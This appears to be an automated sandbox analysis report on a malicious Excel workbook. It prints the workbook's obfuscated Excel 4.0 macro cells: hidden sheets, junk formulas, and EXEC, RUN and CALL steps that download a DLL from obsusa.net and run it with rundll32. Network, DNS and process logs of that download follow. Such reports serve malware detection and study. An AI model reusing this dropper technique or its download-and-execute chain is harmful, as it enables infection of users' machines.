                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://obsusa.net/chemgrcr.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\qqjdkdl.obp""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"")=WORKBOOK.HIDE(""Sheet3"")=WORKBOOK.HIDE(""Sheet4"")=WORKBOOK.HIDE(""Sheet5"")",,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,L,,,,,CBB,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,o,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,"=LEFT(""URdndiond"",2)",,,,,,,o,,,,n,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,n,,,o,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rund,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",St",,,,,,,,,,,,,,,,,,,,"=""ll32 """,,ar,,,,,,,,,,,,,,,,,,,,,,tW,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                    =ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=EXEC(Sheet3!BN47&Sheet3!BM53&Sheet3!BU19&Sheet3!BO52&Sheet3!BO53&Sheet3!BO54)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=RUN(Sheet3!BG25)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)
                                                                                                                                                    "=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=CALL(Sheet3!CA36&Sheet3!BM32&Sheet3!BL36&Sheet3!BL37&Sheet3!BM39,Sheet3!BP28&Sheet3!BP29&Sheet3!BP33&Sheet3!BO31&Sheet3!BP35&Sheet3!BO35&Sheet3!BP37&Sheet3!BN38&Sheet3!BP39&Sheet5!BM31&Sheet5!BF30,Sheet3!BQ27&Sheet3!BR32,Sheet3!BQ41,Sheet3!BU15,Sheet3!BU19,Sheet3!BR48,Sheet3!BS39)=Sheet4!BH32()&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&"""""

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    May 4, 2021 10:57:44.492187023 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.631474018 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.631674051 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.633119106 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.770663977 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.771298885 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.771323919 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.771344900 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.771368027 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.771409988 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.771476984 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.772592068 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.772718906 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.818700075 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.956532955 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.956737041 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:44.957715988 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:45.134879112 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115010977 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115048885 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115072966 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115094900 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115111113 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115117073 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:46.115128040 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.115154028 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:46.115201950 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:46.118524075 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:46.118561029 CEST49711443192.168.2.5170.249.236.47
                                                                                                                                                    May 4, 2021 10:57:46.256160021 CEST44349711170.249.236.47192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:46.256263971 CEST49711443192.168.2.5170.249.236.47

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    May 4, 2021 10:57:25.074767113 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:25.132060051 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:25.860224962 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:25.909481049 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:26.035655975 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:26.065599918 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:26.093810081 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:26.117073059 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:26.927946091 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:26.976722002 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:27.826680899 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:27.875624895 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:28.830481052 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:28.890358925 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:28.985946894 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:29.048388958 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:30.118390083 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:30.169907093 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:31.080326080 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:31.131865025 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:32.045290947 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:32.096545935 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:37.275358915 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:37.328233957 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:38.303996086 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:38.352650881 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:38.511643887 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:38.606848001 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:39.152005911 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:39.243449926 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:40.164068937 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:40.224219084 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:41.179500103 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:41.258758068 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:43.179759026 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:43.246964931 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.377614021 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:44.426377058 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:44.429295063 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:44.489265919 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:45.349729061 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:45.398400068 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:47.200417042 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:47.252237082 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:57:51.654570103 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:57:51.716954947 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:58:03.910079956 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:58:03.959122896 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:58:19.266011953 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:58:19.327101946 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:58:21.256779909 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:58:21.305424929 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:58:58.164371014 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:58:58.212918043 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:59:04.849445105 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:59:04.903203011 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:59:24.440581083 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:59:24.518346071 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:59:33.978415012 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:59:34.027230978 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                    May 4, 2021 10:59:36.338891029 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                    May 4, 2021 10:59:36.396197081 CEST53538138.8.8.8192.168.2.5

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    May 4, 2021 10:57:44.429295063 CEST192.168.2.58.8.8.80x67cStandard query (0)obsusa.netA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    May 4, 2021 10:57:44.489265919 CEST8.8.8.8192.168.2.50x67cNo error (0)obsusa.net170.249.236.47A (IP address)IN (0x0001)

                                                                                                                                                    HTTPS Packets

                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                    May 4, 2021 10:57:44.772592068 CEST170.249.236.47443192.168.2.549711CN=obsusa.net CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Apr 15 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Thu Jul 15 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                    CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                    CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:10:57:36
                                                                                                                                                    Start date:04/05/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x1280000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:10:57:45
                                                                                                                                                    Start date:04/05/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:rundll32 ..\qqjdkdl.obp,StartW
                                                                                                                                                    Imagebase:0xf40000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >